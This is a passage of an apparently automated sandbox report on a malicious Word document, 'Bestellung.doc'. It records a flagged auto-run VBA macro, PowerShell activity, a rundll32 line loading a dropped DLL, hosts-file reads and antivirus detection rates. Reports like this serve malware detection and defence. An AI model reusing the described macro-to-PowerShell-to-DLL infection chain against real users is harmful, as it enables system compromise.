Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F5478 9_2_002F5478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003034BF 9_2_003034BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0030C4A5 9_2_0030C4A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003014FC 9_2_003014FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003034C3 9_2_003034C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002FF52E 9_2_002FF52E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F3523 9_2_002F3523
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00302515 9_2_00302515
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0030C5A1 9_2_0030C5A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002FD5B8 9_2_002FD5B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00300604 9_2_00300604
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00309665 9_2_00309665
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002FB6B9 9_2_002FB6B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003066FB 9_2_003066FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0030A6D9 9_2_0030A6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0030B706 9_2_0030B706
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F177C 9_2_002F177C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002FF797 9_2_002FF797
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002FF793 9_2_002FF793
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F27F3 9_2_002F27F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F9846 9_2_002F9846
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002FC851 9_2_002FC851
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F28AA 9_2_002F28AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F68EC 9_2_002F68EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003038C2 9_2_003038C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002FE8DD 9_2_002FE8DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002FB8D8 9_2_002FB8D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003008CF 9_2_003008CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0030891E 9_2_0030891E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F498C 9_2_002F498C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F598B 9_2_002F598B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F1983 9_2_002F1983
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0030CA55 9_2_0030CA55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F9A99 9_2_002F9A99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F2B70 9_2_002F2B70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002FEB54 9_2_002FEB54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00301BA5 9_2_00301BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002FDB86 9_2_002FDB86
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002FFBE6 9_2_002FFBE6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F9C3D 9_2_002F9C3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0030CC7F 9_2_0030CC7F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0030BC4D 9_2_0030BC4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F6CA5 9_2_002F6CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00303D29 9_2_00303D29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F5D63 9_2_002F5D63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F0D7A 9_2_002F0D7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F4D48 9_2_002F4D48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F3DB8 9_2_002F3DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F9D95 9_2_002F9D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F2EAC 9_2_002F2EAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00309EDA 9_2_00309EDA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002FEF2E 9_2_002FEF2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002FFF2C 9_2_002FFF2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00307FA7 9_2_00307FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00415250 10_2_00415250
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041AA7B 10_2_0041AA7B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00405418 10_2_00405418
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040A821 10_2_0040A821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00418C2B 10_2_00418C2B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00414C37 10_2_00414C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040A6C9 10_2_0040A6C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040A2D2 10_2_0040A2D2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041A0F1 10_2_0041A0F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00419B4A 10_2_00419B4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00405F04 10_2_00405F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040A525 10_2_0040A525
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00409D2F 10_2_00409D2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00402DDF 10_2_00402DDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004067EF 10_2_004067EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00407FFE 10_2_00407FFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00411DFE 10_2_00411DFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00410B8A 10_2_00410B8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00403FAF 10_2_00403FAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00419DBF 10_2_00419DBF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00417BBE 10_2_00417BBE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00404844 10_2_00404844
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040E044 10_2_0040E044
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00410672 10_2_00410672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040BE74 10_2_0040BE74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040327F 10_2_0040327F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00412C05 10_2_00412C05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00401806 10_2_00401806
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00402208 10_2_00402208
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040240F 10_2_0040240F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040E612 10_2_0040E612
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00406417 10_2_00406417
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00410223 10_2_00410223
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041D02D 10_2_0041D02D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00412631 10_2_00412631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00418A33 10_2_00418A33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041C6D9 10_2_0041C6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040D2DD 10_2_0040D2DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041D4E1 10_2_0041D4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040D6F0 10_2_0040D6F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040ECFE 10_2_0040ECFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040DE81 10_2_0040DE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00411090 10_2_00411090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00414A9E 10_2_00414A9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040CAA3 10_2_0040CAA3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040C145 10_2_0040C145
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00413F4F 10_2_00413F4F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041434E 10_2_0041434E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041135B 10_2_0041135B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040C364 10_2_0040C364
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041B165 10_2_0041B165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041A966 10_2_0041A966
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040F369 10_2_0040F369
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00403B74 10_2_00403B74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00407378 10_2_00407378
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00405B7D 10_2_00405B7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00414F04 10_2_00414F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00409106 10_2_00409106
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041D70B 10_2_0041D70B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041CF31 10_2_0041CF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00407731 10_2_00407731
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00403336 10_2_00403336
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00403938 10_2_00403938
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00407B39 10_2_00407B39
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041DBC4 10_2_0041DBC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004057D4 10_2_004057D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040F5E0 10_2_0040F5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00416BE4 10_2_00416BE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041CBE7 10_2_0041CBE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041BBF1 10_2_0041BBF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004035FC 10_2_004035FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00417187 10_2_00417187
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00411F88 10_2_00411F88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00404D90 10_2_00404D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00413590 10_2_00413590
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041C192 10_2_0041C192
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040BB96 10_2_0040BB96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00412FA1 10_2_00412FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004193AA 10_2_004193AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040ADAF 10_2_0040ADAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004147B5 10_2_004147B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004109B8 10_2_004109B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040F9BA 10_2_0040F9BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040FFBA 10_2_0040FFBA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00309C3D 10_2_00309C3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00314012 10_2_00314012
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Bestellung.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Ynzysnuyyfihfq23d, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: Bestellung.doc OLE indicator, VBA macros: true
Source: powershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100282521.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099142810.0000000002010000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100145610.0000000002010000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@16/12@6/12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00412B68 CreateToolhelp32Snapshot, 10_2_00412B68
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$stellung.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC6D7.tmp Jump to behavior
Source: Bestellung.doc OLE indicator, Word Document stream: true
Source: Bestellung.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ..%..................................... .D.......D.....................................#.........................%.....h.......5kU............. Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ................(...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......(.......L....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........]............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j....................................}..v....(.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j..... ..............................}..v............0.................].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....................v..j....................................}..v............0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j......].............................}..v............0...............x.].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....#...............&..j....................................}..v............0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............&..j..... ..............................}..v....X.......0.................].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....7..................j.....G].............................}..v.....O......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j....xP..............................}..v.....P......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....C..................j.....G].............................}..v.....W......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j....xX..............................}..v.....X......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............0.......O.........................D..... .......................}..v....._...... .................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j....x`..............................}..v.....`......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v.....e......0................D].....(.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[..................j.....e..............................}..v....Hf......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.4.............}..v....Xj......0................D].....$.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g..................j.....k..............................}..v.....k......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....s..................j.....G].............................}..v....Xr......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j.....s..............................}..v.....s......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....Xz......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....{..............................}..v.....{......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....'..................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....3..................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3..................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....?..................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?..................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............E.......K..................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K..................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....W..................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W..................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....c..................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c..................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....o..................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o..................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....{..................j.....G].............................}..v....X"......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j.....#..............................}..v.....#......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X*......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....+..............................}..v.....+......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X2......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....3..............................}..v.....3......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............8.8.'.+.'.V.'.).).].............................}..v.... 7......0................D].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....7..............................}..v....X8......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v.....?......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....?..............................}..v....8@......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v.....E......0.................%.....r.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....@F..............................}..v.....F......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ..........j.....G].............................}..v....PJ......0................D].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....K..............................}..v.....K......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....E...............................}..v............0.................].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....E...............................}..v....(.......0.................].............(............... Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
Source: Bestellung.doc Virustotal: Detection: 53%
Source: Bestellung.doc ReversingLabs: Detection: 11%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
